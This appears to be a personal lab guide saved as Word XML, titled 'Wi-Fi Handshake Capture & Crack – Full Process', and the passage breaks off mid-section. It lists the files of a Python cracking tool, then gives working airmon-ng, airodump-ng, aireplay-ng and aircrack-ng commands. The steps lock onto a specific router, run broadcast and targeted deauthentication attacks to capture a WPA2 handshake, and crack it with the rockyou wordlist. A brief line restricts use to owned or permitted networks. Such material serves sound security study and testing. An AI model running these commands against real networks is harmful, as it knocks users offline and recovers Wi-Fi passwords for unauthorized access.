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38D6D" w14:textId="62DFA54A" w:rsidR="00EE66BE" w:rsidRPr="00EC4B4E" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC4B4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wi-Fi Handshake Capture &amp; Crack – Full Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F4071" w14:textId="7F08A8A2" w:rsidR="002B5DB0" w:rsidRDefault="002B5DB0" w:rsidP="002B5DB0">
      <w:r>
        <w:t>Files:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>main.py: Serves as the entry point, orchestrating the scanning, attack, and cracking processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A1EBD" w14:textId="0A3A3CDA" w:rsidR="002B5DB0" w:rsidRDefault="002B5DB0" w:rsidP="002B5DB0">
      <w:r>
        <w:t>scanner.py: Handles scanning and listing of nearby Wi-Fi networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA31F70" w14:textId="773D1D2E" w:rsidR="002B5DB0" w:rsidRDefault="002B5DB0" w:rsidP="002B5DB0">
      <w:r>
        <w:t>handshake_capture.py: Manages the capture of WPA/WPA2 handshakes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5198EE" w14:textId="7E95716E" w:rsidR="002B5DB0" w:rsidRDefault="002B5DB0" w:rsidP="002B5DB0">
      <w:r>
        <w:t xml:space="preserve">deauth_attack.py: Conducts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deauthentication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attacks to force clients to reconnect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ACC6BE" w14:textId="462D95C0" w:rsidR="002B5DB0" w:rsidRDefault="002B5DB0" w:rsidP="002B5DB0">
      <w:r>
        <w:t>cracker.py: Performs dictionary attacks on captured handshakes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CE4287" w14:textId="5DD6CC47" w:rsidR="002B5DB0" w:rsidRDefault="002B5DB0" w:rsidP="002B5DB0">
      <w:r>
        <w:t>rogue_detector.py: Detects suspicious or fake access points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC4FC2E" w14:textId="0EDAE826" w:rsidR="002B5DB0" w:rsidRPr="00EE66BE" w:rsidRDefault="002B5DB0" w:rsidP="002B5DB0">
      <w:r>
        <w:t xml:space="preserve">network_utils.py and packet_utils.py: Provide utility functions for network and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>packet operations</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B54AFD" w14:textId="3C30BB0C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1: Get Your USB Wi-Fi Adapter Working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D5ADC7" w14:textId="3484993F" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Plug in adapter and ensure VirtualBox/VMware passes USB to Kali VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78A61A" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Install required tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F932C52" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17EC88" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> apt install dkms build-essential git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9CD5C" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Install RTL8812AU driver (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Netgear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E05A1" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>git clone https://github.com/aircrack-ng/rtl8812au.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AC70F" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>cd rtl8812au</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A634E90" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> make </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>dkms_install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EC9A210" w14:textId="792A56B7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2: Switch Adapter to Monitor Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574859C6" w14:textId="3ACB5C51" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Kill interfering processes:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>-ng check kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793EC563" w14:textId="17CC244D" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Enable monitor mode:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782768ED" w14:textId="0D995C3E" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>You now have wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337F54F3" w14:textId="3FBFF76C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3: Scan for Wi-Fi Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39054A42" w14:textId="549E37B8" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>-ng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>-ng wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC419C" w14:textId="18C42398" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r>
        <w:t xml:space="preserve">For: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Target BSSID (router MAC)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Channel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Connected client MACs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481BC85E" w14:textId="175692D7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lastRenderedPageBreak/>
        <w:t>STEP 4: Lock onto Target Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021182D5" w14:textId="030C1D88" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="002B5DB0" w:rsidP="00EE66BE">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>arget:</w:t>
      </w:r>
      <w:r w:rsidR="00EE66BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> 98:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>fc:11:41</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>:b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>9:a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EE66BE" w:rsidRPr="00EE66BE">
        <w:t>7 --channel 11 --write handshake wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E11A25" w14:textId="4531CD74" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Let this run in one terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B4BAF5" w14:textId="31BD45F6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 xml:space="preserve">STEP 5: Force Reconnection with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B4556" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>In a second terminal:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED27249" w14:textId="14B34407" w:rsidR="0041661C" w:rsidRDefault="0041661C" w:rsidP="00EE66BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0041661C">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0041661C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0041661C">
        <w:t>iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0041661C">
        <w:t xml:space="preserve"> wlan0mon channel 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F479920" w14:textId="1AAA034F" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">Broadcast </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> (everyone):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> 10 -a </w:t>
      </w:r>
      <w:r w:rsidR="00551E0E">
        <w:t>&lt;BSSID&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA843C" w14:textId="7869FFF6" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">Targeted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> (recommended):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> 10 -a </w:t>
      </w:r>
      <w:r w:rsidR="00551E0E">
        <w:t>&lt;BSSID&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:r w:rsidR="00551E0E">
        <w:t xml:space="preserve">&lt;Station ID&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D774718" w14:textId="07C6EA68" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">Keep an eye on the top-right of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>-ng until you see</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> something like </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">WPA handshake: </w:t>
      </w:r>
      <w:r w:rsidR="00551E0E">
        <w:t>&lt;Station ID&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF2608" w14:textId="27378301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6: Verify the Handshake File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A79425" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">capture file: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>ls | grep handshake</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD54148" w14:textId="50B9C42B" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r>
        <w:t>Expect something like “</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>handshake-01.cap</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72487E38" w14:textId="4B8729AD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7: Prepare the Wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0559BAB3" w14:textId="719D8487" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Decompress Kali’s default wordlist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if needed: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
      <w:r>
        <w:t>, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> simply goes to step 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5C13EE" w14:textId="5D2B76BD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8: Crack the Handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BACE595" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>-ng handshake-01.cap -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064BCA1F" w14:textId="77777777" w:rsidR="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>Aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">-ng will test each password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> the list. If the password is in there, you’ll get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> something like: “</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">KEY FOUND! [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592622C9" w14:textId="5E394DD8" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IMPORTANT NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E6C7BC" w14:textId="205788C1" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">This method only works on </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WPA/WPA2-PSK</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">, not </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WPA3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB5D783" w14:textId="193F5B78" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">Only attack networks you </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>own</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> or have </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>explicit permission</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve"> to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77198A70" w14:textId="741D7D5C" w:rsidR="00EE66BE" w:rsidRPr="00EE66BE" w:rsidRDefault="00EE66BE" w:rsidP="00EE66BE">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t xml:space="preserve">dd GPU-accelerated tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE66BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE66BE">
        <w:t>for faster cracking later</w:t>
      </w:r>
      <w:r w:rsidR="00FB4E0E">
        <w:t xml:space="preserve"> if needed (since actual password cracking took 8-9 hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521AA6A" w14:textId="29E0E054" w:rsidR="00F2418F" w:rsidRPr="00EE66BE" w:rsidRDefault="00F2418F" w:rsidP="00EE66BE"/>
    <w:p w14:paraId="7793629F" w14:textId="77777777" w:rsidR="00F2418F" w:rsidRPr="00F2418F" w:rsidRDefault="00000000" w:rsidP="00F2418F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="56B59238">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3B5DDA" w14:textId="57C51207" w:rsidR="00F2418F" w:rsidRPr="00F2418F" w:rsidRDefault="00F2418F" w:rsidP="00F2418F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F2418F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Save Handshake Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C6A35" w14:textId="77777777" w:rsidR="00F2418F" w:rsidRPr="00F2418F" w:rsidRDefault="00F2418F" w:rsidP="00F2418F">
      <w:r w:rsidRPr="00F2418F">
        <w:t>To verify or inspect later:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A9000F" w14:textId="77777777" w:rsidR="00F2418F" w:rsidRPr="00F2418F" w:rsidRDefault="00F2418F" w:rsidP="00F2418F">
      <w:proofErr w:type="spellStart"/>
